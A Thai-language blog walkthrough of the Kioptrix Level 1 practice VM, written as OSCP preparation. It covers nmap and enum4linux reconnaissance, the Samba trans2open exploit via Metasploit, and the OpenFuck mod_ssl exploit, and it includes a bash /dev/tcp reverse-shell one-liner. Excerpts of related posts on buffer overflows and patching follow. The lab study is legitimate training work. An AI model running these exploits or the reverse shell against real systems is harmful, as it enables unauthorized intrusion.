Skip to main content

Kioptrix #1 Walkthrough <> รีวิว Lab Kioptrix level 1

This lab is one of Kioptrix series that I learned before take OSCP exam on 2015. For this post I write with only Thai language. However you can simply understand my step from pictures. 

post วันนี้เอา lab สมัยตอนเตรียมตัวสอบ oscp มา walkthrough ย้อนหลังอีก 1 lab ชื่อ Kioptrix level 1 ครับ เขียนรีวิวไว้ตั้งแต่สอบเสร็จปี 2015 เช่นกัน ช่วงนี้เอาเรื่องเก่าๆมาทบทวน พบว่าลืมไปเยอะเหมือนกัน มีกระบี่ต้องคอยลับคมนะครับ มาเริ่มกันเลยดีกว่า

ผมทำ lab นี้โดย run ตัวเป้าหมายบน VM นะครับ 

1. ก่อนอื่นก็เลยต้องใช้ net discover เพื่อค้นหาในวง subnet ของเราว่าเป้าหมายเป็น ip อะไร

# netdiscover -r 192.168.xx.0/24



2. รัน nmap เพื่อหา service ที่น่าสนใจ


# nmap -p1-65535 -sS -sV -A 192.168.xx.20


3. พบ port 80 ลองใช้ nikto ทำการ scan พบบางอย่างน่าสนใจ ตามภาพ
เราจะทำ exploit จากข้อมูลที่ได้ในขั้นตอน recon กับ discover

วิธีการที่ 1

จากผลของ nmap พบว่าเป็น linux 2.4.9 ซึ่งค่อนข้างเก่า และมีการใช้ samba ด้วย ดังนั้นเราจะลองใช้ tools ชื่อ enum4linux ซึ่งมีใน kali อยู่แล้ว scan ได้ผลดังภาพ



พบ samba version 2.2.1a ซึ่งมีช่องโหว่ trans2open  ตามภาพจากใน exploit-db 


ก็จัดเลย โดยผมจะใช้ metasploit แทนการใช้ script เพราะมีมาให้อยู่แล้ว และจากที่ไปดูของคนอื่นที่ทำรีวิว ปรากฏว่าเขาใช้อีกช่องโหว่นึงด้วย ผมก็จะไปอันนี้เร็วๆ จะได้เขียนอีกอันนึง



ได้เป็น limited shell ซึ่งถ้าอยากได้ interactive shell ก็ไม่ยากใช้สูตรเดิม

bash -i >& /dev/tcp/192.168.xx.16/4444 0>&1  (โดยใส่ ip เครื่องเราลงไป)



วิธีการที่ 2 

วิธีนี้ไปเห็นของคนอื่นใน internet เลยมาทำต่อ คือจากผลของ nikto ที่ scan เจอเรื่อง mod_ssl ด้านบน เราเอาไป search ใน google เจาอันนี้เลย OpenFuck



ซึ่งใน kali ของเราก็มีอยู่แล้ว ลอง search ดู



ซึ่งจากข้อมูลใน exploit-db จะบอกให้เราทำการ modify code ตาม 
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/  

ผม copy มาให้ตามนี้ครับ


แล้วพอลอง run ดูจะมีให้เลือก version ของ apache เป้าหมาย ก็เลือกตามภาพ


ลองรัน code ที่เราทำการ compile เสร็จแล้วเพื่อโจมตี

# ./openfuck 0x6b 192.168.99.20 443

 ผลที่ได้ got a shell


Comments

Popular posts from this blog

CesarFTP BOF Review / Review การทำ Buffer Overflow CesarFTP

version ภาษาไทย ไว้มีเวลาจะมา update ภายหลังครับ Today I would like to review my old one lesson about buffer overflow before I take the OSCP exam in 2015. I wish you learn basic BOF from this post. CesarFTP is the one ftp software which is vulnerabled to BOF (buffer overflow). 1. The first step I download vulnerabled software from internet and install on WinXP (vm) and then 2. Try to search for exploit in my kali linux  (No, I don't exploit by metasploit just find the start code and try to make it overflow) This original python 1906.py code is as picture below. I have to change "host" ip before do next step. ***Let's take a look at "buffer". That is something I have to modify later.*** but right now I begin with Fuzzing to find how many characters can crash this application ? 3. Control EIP address - try to replace character after  "\n" * 671 by "A" 350 characters and found that Cesar not be crashed. - Let&

My OSCP Review <-> รีวิว ประสบการณ์การสอบ OSCP ( It is just the beginning)

เนื้อหาภาษาไทยสามารถดูได้ด้านล่างนะครับ About me I would like to tell you before that my english writing skill is not good, ^^", but I will try . I was Network Engineer and System Engineer with 10 years working experience and have CCNP, CCNP Security, CCDP, ITIL, MCP and I have experience in ISO27001 for 4 years. Right now I move to be a Penetration Tester in new company for 6 months. Inspiration Actually before getting a new job as pentester I would like to take CEH or ECSA certificate. But after do a new job, my three colleagues have OSCP and they are my model. All of them have an awesome skill. Then I try to find more information about OSCP and found that OSCP is very difficult to pass, no exam dump, no one answer you. Although I have a few experience on hacking but I think I can try and TRY HARDER. OSCP Course There are two course manual, pdf and video that are dependent. After I got them I tried to read from PDF only but not enough, many technics ar

Patch Management และ Hardening คืออะไร/ ยังไง พร้อมวิธีการ ตอนที่ 1

post นี้ก็เช่นเกียวกับโพสต์อื่นๆที่ ผู้เขียนเขียนขึ้นจากประสบการณ์การทำงานนะครับ ส่วนในเรื่องของ ISO27001 ทางผู้เขียนยังไม่รู้ครอบคลุมขนาดนั้น ขอยังไม่กล่าวถึง คงได้เขียนหลังจากสอบ CISSP ได้แล้ว (ตอนนี้ยังอยู่ในวงการ Pentest อยู่เลยจ้า) คืออะไร ? Patch Management และ Hardening  -  เป็นส่วนนึงของ configuration management process ใน ISO27001 และมาตรฐานทางด้านความปลอดถัยอื่นๆ ด้วย  ทำไมต้องมีการทำ patch และ hardening เรื่องของ Patch management จริงๆ ก็จะเกี่ยวข้องกับการทำ Hardening นะละ นั่นคือทำเพื่อปิดช่องโหว่ให้น้อยที่สุดเพื่อลดความเสี่ยงที่จะถูกโจมตีจากผู้ไม่ประสงค์ดี มันก็ไม่ดีใช่ไหมละ ถ้าระบบของเราโดนโจมตี ซึ่งอาจจะเป็นในแง่ของการขโมยข้อมูล หรือที่องค์กรส่วนใหญ่รับไม่ค่อยได้คือการโดน dos จนทำให้อุปกรณ์ไม่สามารถให้บริการต่อได้ ก็เรื่อง Availability ไง ในบางบริษัทที่มีการทำ transaction เกี่ยวกับเงินนี่ เขาคิดค่าเสียหายเป็นนาทีเลยนะ ล่มแค่ครึ่งชั่วโมงก็เสียหายหนักแล้ว กระบวนการการทำ Patch กับ hardening ก็จะมีดังนี้ คือ เขียน flow ให้ดูกันง่ายๆ อ่านคำอธิบายต่อได้ด้า